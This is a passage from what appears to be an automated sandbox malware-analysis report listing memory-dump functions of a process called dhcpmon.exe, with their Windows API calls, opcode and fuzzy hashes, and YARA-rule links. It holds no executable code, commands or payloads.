Opcode Fuzzy Hash: cdad9a5ecaacd2d423174972a09b6b85150d4af1e93a76f7fd2c37318bf38244
Instruction Fuzzy Hash: 65E092B66046004BD650CF0AEC82452F7D8EB84730758C47FDC0D8B701D535B504CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 02AC1EE9, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.262842270.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a177cde559a068e31af9ae0b28993610636f5f4496203c13594b2ceb0c749d9
Instruction ID: e6aad996930999bc253e02d5c91d008e71cfa0a45707ae4919d0431fafaed94d
Opcode Fuzzy Hash: 4a177cde559a068e31af9ae0b28993610636f5f4496203c13594b2ceb0c749d9
Instruction Fuzzy Hash: B7E0D8753482604FD726666DB41495A7FAEDFC531471040BBE005D7766CE755C068391

Uniqueness

Uniqueness Score: -1.00%

Function 02AC1EF8, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.262842270.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be98f7ea18c3972ec050f9e9dde1f280fde78360bd60bba697ae601a7881764d
Instruction ID: a08ebe18de31502ebcec08123303099966e40ff55543263e9042e52bfaae575b
Opcode Fuzzy Hash: be98f7ea18c3972ec050f9e9dde1f280fde78360bd60bba697ae601a7881764d
Instruction Fuzzy Hash: 13E0C2313001208FC31866AEE410A4E77DEEBC9324B10407AE109C7361CEB5AC0143A1

Uniqueness

Uniqueness Score: -1.00%

Function 02AC06C8, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.262842270.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59a2b1788135696bf50266fe4c86a8d68247bf925f47db17b8e2f8fceb204690
Instruction ID: 4ddd970e8d53c0b4a18bfe130036ac4445c439b7d2672f6986b8c56cd79526b9
Opcode Fuzzy Hash: 59a2b1788135696bf50266fe4c86a8d68247bf925f47db17b8e2f8fceb204690
Instruction Fuzzy Hash: 29E086D640E2C18FC7066324AC242447F614A922657B941CAD092494E3EF554457C752

Uniqueness

Uniqueness Score: -1.00%

Function 02AC1E0F, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.262842270.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92bfa4eef0d06d7bbbed376fa53e2cd71a1a549b53372f90786ff20441f663f5
Instruction ID: 815f18789468331991fdbbf95e6cd91ca8db387a7bbe4346298619c20928b4da
Opcode Fuzzy Hash: 92bfa4eef0d06d7bbbed376fa53e2cd71a1a549b53372f90786ff20441f663f5
Instruction Fuzzy Hash: 9FD0C7B88083912FE7038208E8E83CA7FA0AE82518F48C48CC8800A063E774914FC382

Uniqueness

Uniqueness Score: -1.00%

Function 02AC0251, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.262842270.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90de92f22a746713d36d1a2672c77d23bcaec9e63fbadb3c81a15f841311fb59
Instruction ID: c189a5ef9463fb47374f23d72813a25d33efa116283021495cda722812175863
Opcode Fuzzy Hash: 90de92f22a746713d36d1a2672c77d23bcaec9e63fbadb3c81a15f841311fb59
Instruction Fuzzy Hash: 3ED0C936B140008FDB4096ADA4051ACB7A1AFC5225B1010ABD50AEB651D92189198601

Uniqueness

Uniqueness Score: -1.00%

Function 02AC0130, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.262842270.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc9c18f88af73892ab5840256aa81c799456ef6c875ac6740edd1277ece5aee3
Instruction ID: 0aa53a72b38cfe68b1bcfa09066a5f112d259223871be5047fb74ffdb303f8a5
Opcode Fuzzy Hash: bc9c18f88af73892ab5840256aa81c799456ef6c875ac6740edd1277ece5aee3
Instruction Fuzzy Hash: 03C02B3038060807DF0017F87C8832E338CA780E08F000434B40DC7240EE19E8004250

Uniqueness

Uniqueness Score: -1.00%

Function 02AC1E20, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.262842270.0000000002AC0000.00000040.00000001.sdmp, Offset: 02AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a58681122729a4e573fa556bd1f9a5530d13125d06b48100e118f1ff855cdd87
Instruction ID: d8b044d3dfd7e53ad1510b4ce2720f627be6756da4f0d8c3477281f60f122686
Opcode Fuzzy Hash: a58681122729a4e573fa556bd1f9a5530d13125d06b48100e118f1ff855cdd87
Instruction Fuzzy Hash: 38C01270418201AFC740EF28EC45A6E7BF0EA80605F40CD2CE48DC2110F270561CCB53

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: dhcpmon.exe PID: 6140 Parent PID: 3472 dhcpmon.exeCOMMON

Executed Functions

Function 0112A2C1, Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0112A371

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 58ff68a28de47190f4a2ca1d6c4e4e48005d242e9e9bb254d1ab537216a95ede
Instruction ID: af72239a84ae836c3a492af5d0e61a19341af80208fcb4cf735e9651301da2e3
Opcode Fuzzy Hash: 58ff68a28de47190f4a2ca1d6c4e4e48005d242e9e9bb254d1ab537216a95ede
Instruction Fuzzy Hash: 61318E75508380AFE722CF69DC85F56BFF8EF05310F0884AAE9858B652D375E818CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0112A2F2, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0112A371

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 36303ceb886f70aba30bff4a574576ae9ef778a538067d74afc0ad54a83750eb
Instruction ID: 9993ef8d89f3ea1488501d0a4f5d7e077ad934f60c01725a331d1a2cab25136e
Opcode Fuzzy Hash: 36303ceb886f70aba30bff4a574576ae9ef778a538067d74afc0ad54a83750eb
Instruction Fuzzy Hash: 0E21B071504640AFEB25CF69DC85B66FFE8EF04710F18846AEA858B642D371E414CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0112AE40, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

VerLanguageNameW.KERNELBASE(?,00000E2C,?,?), ref: 0112AED6

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: LanguageName
String ID:
API String ID: 2060303382-0
Opcode ID: 7d45cd2cd392ce7ba65116284d0ba941593913edadd73da780c409141f3efd2f
Instruction ID: f9eee871d05268172072ebf11ec7eee624a65fecfb874508d47dd41eeaec82d2
Opcode Fuzzy Hash: 7d45cd2cd392ce7ba65116284d0ba941593913edadd73da780c409141f3efd2f
Instruction Fuzzy Hash: 9C2195754093806FD3138B259C51B62BFB4EF97B10F0981DBE8848B553D224A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 0112A483, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E2C,2EE34879,00000000,00000000,00000000,00000000), ref: 0112A509

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 27d26bb1b8ac324e0b91f16f1d23dec8f31afa56070fbd1edfeaf1dcce592ffa
Instruction ID: f9c4412b948a0841d08a2ad3d72be78bffdec66654af8b808066f2181282f852
Opcode Fuzzy Hash: 27d26bb1b8ac324e0b91f16f1d23dec8f31afa56070fbd1edfeaf1dcce592ffa
Instruction Fuzzy Hash: 5021C3B64083806FE7128B659C81BA2BFB8DF46310F1880DAF9849B153D364A909D771

Uniqueness

Uniqueness Score: -1.00%

Function 0112A3C8, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 0112A43C

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 6ec148ed054d2fb0221623a180aee45c282b998456114bb9c1f5d37c83fd0f66
Instruction ID: 395c7efd83688f7211dd22372a1f154362dc7dc31130e83e7cc3cbfb36d0f462
Opcode Fuzzy Hash: 6ec148ed054d2fb0221623a180aee45c282b998456114bb9c1f5d37c83fd0f66
Instruction Fuzzy Hash: D621A4B55097C05FD7128F29DC55692BFB4EF16220F0880EBEC858F563D2649918C761

Uniqueness

Uniqueness Score: -1.00%

Function 0112A824, Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E2C,2EE34879,00000000,00000000,00000000,00000000), ref: 0112A895

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: cf89129053fd9abae7865e40edefddab35b4a46061c522d078faf3b795d87ba7
Instruction ID: 8de669b8f310a901f79583f4cf55932a4a6f7be83ea6a2d0a96cd7919fdc4d53
Opcode Fuzzy Hash: cf89129053fd9abae7865e40edefddab35b4a46061c522d078faf3b795d87ba7
Instruction Fuzzy Hash: F4117CB2500604AEEB218F55DC84FA7FBACEF44720F14886AFE459B651C371A419DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0112AA16, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 0112AA87

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: FileInfoSizeVersion
String ID:
API String ID: 1661704012-0
Opcode ID: 8dcf00c1c695d83f333c5af1e0527bd4bb85bb3b929b2ef057bffb09b52fcf41
Instruction ID: 7fcb4a49fd8456948ea95f57a5747d6093a60185be6c407fa035006c0eb9ff09
Opcode Fuzzy Hash: 8dcf00c1c695d83f333c5af1e0527bd4bb85bb3b929b2ef057bffb09b52fcf41
Instruction Fuzzy Hash: E52190754093C49FD7128F29DC45B52BFB4EF16210F0984EAED848F253D3699809CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0112A836, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E2C,2EE34879,00000000,00000000,00000000,00000000), ref: 0112A895

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 2a0b2d9d699bd8d0f6dd3531559b6195776606870be043bb3231aaea015ab6cf
Instruction ID: fb3f9217294b74496c75c8551482764abf213e714153f67788d497f76db3b88a
Opcode Fuzzy Hash: 2a0b2d9d699bd8d0f6dd3531559b6195776606870be043bb3231aaea015ab6cf
Instruction Fuzzy Hash: 32110A71400204AFEB21CF65EC80F66FFA8EF44711F14846AEE459F641D774A419CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0112AAD8, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GetFileVersionInfoW.KERNELBASE(?,?,?,?), ref: 0112AB3D

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: FileInfoVersion
String ID:
API String ID: 2427832333-0
Opcode ID: 183b205557ec0a2df4d8f7c8d517b9c46e41d3ade775ac1cef363198ac4894fc
Instruction ID: 384e7026943982c3babe7208090dae91c8d8714e6c6d78c8fa8dab8faf5a2d74
Opcode Fuzzy Hash: 183b205557ec0a2df4d8f7c8d517b9c46e41d3ade775ac1cef363198ac4894fc
Instruction Fuzzy Hash: E711B672504780AFDB228F15DC45B62FFB8EF46610F08849EED858B653D261E918CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0112A1F4, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0112A290

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 7e8df7c7673c58b409aaaccfc9fac7f55225b874339c016960b29aa46979e3b5
Instruction ID: 592c93a901993d9e0c695132f3641f018654b81e99fd4f13c8d7a984daef0f1b
Opcode Fuzzy Hash: 7e8df7c7673c58b409aaaccfc9fac7f55225b874339c016960b29aa46979e3b5
Instruction Fuzzy Hash: D211163550E3D08FD7178B2598A4350BFB0EF13220F1D84DBC9888F6A3C26A9959DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0112A8DF, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNELBASE ref: 0112A949

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: b790e4d4ccdfb567d35d26d161d070d744dd72d208a22db24d27fb32a9d77772
Instruction ID: 71163971dff1a356028c46e8739f47def1f012f6024be993376cbcb804ae2ba8
Opcode Fuzzy Hash: b790e4d4ccdfb567d35d26d161d070d744dd72d208a22db24d27fb32a9d77772
Instruction Fuzzy Hash: 0911BF754093C45FDB128B29DC95792BFA4EF02324F0A80DAED844F163D364A909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0112A4B6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E2C,2EE34879,00000000,00000000,00000000,00000000), ref: 0112A509

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: b6db098deb1c57023dbf689876067d04d6e44d28942c45d735a8315d8acae566
Instruction ID: 283a18aa41aaf7de411e5aafd9bbf71fffc5da81d321de5b1a33f52f2814720c
Opcode Fuzzy Hash: b6db098deb1c57023dbf689876067d04d6e44d28942c45d735a8315d8acae566
Instruction Fuzzy Hash: 7301F5B1504204AFE720CB19EC85F67FFACDF44720F14C4AAEE459B641D774A504CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 0112A23C, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0112A290

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 76c1ecb7f7dcfc9580ac24ba34cfba68f59476c4f1655f1b6aa007fbf88cc33a
Instruction ID: 50b2f55aa57d46ccf2d0d59c12e673756c26c9b31fcf49ef469b790451082afe
Opcode Fuzzy Hash: 76c1ecb7f7dcfc9580ac24ba34cfba68f59476c4f1655f1b6aa007fbf88cc33a
Instruction Fuzzy Hash: 141184754093C4AFDB128B15DC84B62FFB8DF46624F0880DAED858F653D275A918CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0112AAFA, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetFileVersionInfoW.KERNELBASE(?,?,?,?), ref: 0112AB3D

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: FileInfoVersion
String ID:
API String ID: 2427832333-0
Opcode ID: 46c8208b37cafc99621fe30f756dca3dd7fa81cad37e5752682266dd805435ce
Instruction ID: d6342d97388dcdf499425c1318eac34fe275df85e37049875d451dfbb67c1d2d
Opcode Fuzzy Hash: 46c8208b37cafc99621fe30f756dca3dd7fa81cad37e5752682266dd805435ce
Instruction Fuzzy Hash: CC0180755006009FDB248F29E885B56FFA4EF04621F0884AAED458BA52D371E458CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0112AA4A, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 0112AA87

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: FileInfoSizeVersion
String ID:
API String ID: 1661704012-0
Opcode ID: f6e53a191d94c2af7f4f087f24098656c652e8d1afdd493cfe4fae6627b387fe
Instruction ID: 053c14a8fdadb91a23feaa125d993a16063ff01bae028211e7bc5aa377d3dfb1
Opcode Fuzzy Hash: f6e53a191d94c2af7f4f087f24098656c652e8d1afdd493cfe4fae6627b387fe
Instruction Fuzzy Hash: C2019A759002409FEB24CF69E984766FFE8EF04220F08C4AADD498B646E374E414CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0112AE86, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

VerLanguageNameW.KERNELBASE(?,00000E2C,?,?), ref: 0112AED6

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: LanguageName
String ID:
API String ID: 2060303382-0
Opcode ID: e7939a1bf841a49bd2dd67b52f63c70a6b70defb81e102909b92dd77da4724ad
Instruction ID: c35a8a0c87ab09de7e8c2915da06c6283f596353b7bb50a94ed1bb7fc0083fb5
Opcode Fuzzy Hash: e7939a1bf841a49bd2dd67b52f63c70a6b70defb81e102909b92dd77da4724ad
Instruction Fuzzy Hash: A501A272500200ABD210DF1ADC86F26FBE8FF98B20F14811AED084B745E631F515CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0112A40A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 0112A43C

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 46a66b8fdf0a5575f4b0aafc35e75e264a40779b7e386f6db9451cbc10ba6b78
Instruction ID: df76062caada047bf250af041da80349621c609bd60c82c5a6e741cbcb3f1335
Opcode Fuzzy Hash: 46a66b8fdf0a5575f4b0aafc35e75e264a40779b7e386f6db9451cbc10ba6b78
Instruction Fuzzy Hash: 8D018F759002809FEB14CF29E889766FFA4DF44220F18C0AADD498FA56D775E414CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0112A25E, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0112A290

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 3e50fb235a498b1be3e369eab1207f139d17916824ed8414783c08db40fda24a
Instruction ID: 1e4c17896ee168d84017a42636304708419fa71f76baf22696406a573c54e60a
Opcode Fuzzy Hash: 3e50fb235a498b1be3e369eab1207f139d17916824ed8414783c08db40fda24a
Instruction Fuzzy Hash: 62F022748042508FDB10CF19E884721FFA0EF05320F18C0AAED490BB42D376A418CEB2

Uniqueness

Uniqueness Score: -1.00%

Function 0112A91A, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNELBASE ref: 0112A949

Memory Dump Source

Source File: 0000000C.00000002.273742773.000000000112A000.00000040.00000001.sdmp, Offset: 0112A000, based on PE: false

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: 5b746b0445babf7b2c3f14696bc2a15e5a2c1e590c1930ed3a2e53f0781ea7d8
Instruction ID: 4df050ed6432600f8242cfc5f8c2e637d23554e70591bc69327be2ad93f42ae6
Opcode Fuzzy Hash: 5b746b0445babf7b2c3f14696bc2a15e5a2c1e590c1930ed3a2e53f0781ea7d8
Instruction Fuzzy Hash: 74F0AF745002448FDB148F1AE885766FFA4DF44620F18C09ADD494B756E375A554CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 02B11B02, Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b4f6f4735119c83fda141d435829e16c9802100bac70db35e6f6074370c5228
Instruction ID: 99056318fb7a99a5947f3738dff83aae7ff84b5d93e632961da33549a0ec66fb
Opcode Fuzzy Hash: 0b4f6f4735119c83fda141d435829e16c9802100bac70db35e6f6074370c5228
Instruction Fuzzy Hash: 0B71CE306102149FD329DB29D854B6BBBE6EF81711F8085AAE65ACF285DB71EC44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02B11540, Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84b962470a8a64706edfbd1e4149bf8f52f6b2b7105acd0a20ab84eaeeb30f02
Instruction ID: 4311bd1a079d7adcced317cdc82a309fb71b36d56b45832506bb223bef533ab9
Opcode Fuzzy Hash: 84b962470a8a64706edfbd1e4149bf8f52f6b2b7105acd0a20ab84eaeeb30f02
Instruction Fuzzy Hash: 29518A347102118FDB18AB38D41876E3BA7EFC8361F5480B6D91AC7399EB759C86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02B10006, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a5565ed0a077022415c334d8764140aba513af78760d37305301d098952c25
Instruction ID: 34089a41f06a6d2751aed3d2d63d33d438f9655f5e771160888dc2147e387e4f
Opcode Fuzzy Hash: 01a5565ed0a077022415c334d8764140aba513af78760d37305301d098952c25
Instruction Fuzzy Hash: 9331506050D3C18FC306AB78C86865A7FB1AF83318F5944EED085CF1A7E7798849C756

Uniqueness

Uniqueness Score: -1.00%

Function 02B10150, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d8f02764167a1504fc8e3015f8b34693ba99d1703f4f13614573fc87f01f3f7
Instruction ID: 6530246e4827a12be04f23d35c9c85946c0da6624988cf0788119320fc5e8b68
Opcode Fuzzy Hash: 2d8f02764167a1504fc8e3015f8b34693ba99d1703f4f13614573fc87f01f3f7
Instruction Fuzzy Hash: BA218176E00108ABCB19DFA6E8449DEBBBAFF8C310F10803AE515F3214EB318941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02B11453, Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83b3533e4679626e02b6877bc7583fa4407fa60e6332062842a3787dc4f12925
Instruction ID: 7adc5286274ebffc6051814e2db07abbe882f8c82734264e371e8bde2335ab76
Opcode Fuzzy Hash: 83b3533e4679626e02b6877bc7583fa4407fa60e6332062842a3787dc4f12925
Instruction Fuzzy Hash: 4821AE303042918FD72AAB69A82872F7BABEF85654B1440AAD506CB38ADF74CC43C755

Uniqueness

Uniqueness Score: -1.00%

Function 02B10521, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 506b2efe62076f7173cc40bf3e033defac5e5f379a7eacfd2e2365d6faaf8a16
Instruction ID: b17c251fa9eb449370116447893f29a2ff315a8bb876552fb5394fe2b70db174
Opcode Fuzzy Hash: 506b2efe62076f7173cc40bf3e033defac5e5f379a7eacfd2e2365d6faaf8a16
Instruction Fuzzy Hash: 61213D307412608FC75ABB3C9064A7E3AE7BFC6705B2504B9D446CF7A6DE398C419792

Uniqueness

Uniqueness Score: -1.00%

Function 02B1187A, Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab28080ea30d79909f8e4ef19955d86b8ffae9ef77ed13f0a3fe7a9737d3bb2d
Instruction ID: fab09db10292aaa598c2e40d70839de6efd5c5a80e54f7f8710372aa697a6f08
Opcode Fuzzy Hash: ab28080ea30d79909f8e4ef19955d86b8ffae9ef77ed13f0a3fe7a9737d3bb2d
Instruction Fuzzy Hash: 4211D6307083628FC715EB7DC86056E3BE3AFCA21476445ADD049CB396EB359C06CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02B10530, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 155b64bcda713e026ef644e2049a428575c7793aaceefd145e88558c401b4303
Instruction ID: 1a124354f5beec920279745275f7e13de206ec2d6768fea33ab1bbff7461cadd
Opcode Fuzzy Hash: 155b64bcda713e026ef644e2049a428575c7793aaceefd145e88558c401b4303
Instruction Fuzzy Hash: 5311FB303401608FC759B73D9068A2E3AE7BFC5745B2404B8D946CF7A5DE39DC419796

Uniqueness

Uniqueness Score: -1.00%

Function 02B11770, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f278500fa3fc45b4589365761297a18c3b7290b13dc1f1fee3c32ce4a40c5df1
Instruction ID: c644595e493ae2a936cc82d8ce615cc53f14a0bf47aa5911472f5caf61789bb1
Opcode Fuzzy Hash: f278500fa3fc45b4589365761297a18c3b7290b13dc1f1fee3c32ce4a40c5df1
Instruction Fuzzy Hash: 14113A76B042908FC715AB7CE4147A93BE6EF89711F0440F6D10ACB396DA799C49C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 02B10697, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6281fc095ed707d55b098d51f2b858f8922e393fc64c33ce5934afe3444b9d2c
Instruction ID: a32fcea83af52c5f9476273f9b6521f00f92c1e22edd23b4b6c558ffebe806c0
Opcode Fuzzy Hash: 6281fc095ed707d55b098d51f2b858f8922e393fc64c33ce5934afe3444b9d2c
Instruction Fuzzy Hash: 2A01CC357001618FCB4DAB39941C6AE3BF3BFC962472941BAC80ACB2A9DF3548478742

Uniqueness

Uniqueness Score: -1.00%

Function 02B11570, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e69094af32f5f3f039e7748ec590109c9a3a87ce64540dcf4a6d01fbe1f75fa
Instruction ID: 616cce07f7b321edf254b96ac52c6a9d58b948a0274cd69f6118b5d386a1f17d
Opcode Fuzzy Hash: 7e69094af32f5f3f039e7748ec590109c9a3a87ce64540dcf4a6d01fbe1f75fa
Instruction Fuzzy Hash: AF012436B202108BC724AB3DE8447AA73EBEFC4351F4445B5DA1BC7349EB349840C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 02B10630, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.273921550.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aad0d39270889e2dcf6d70a5fa0dc612867b83f9d5099db9e8d92ab5e7c19bb
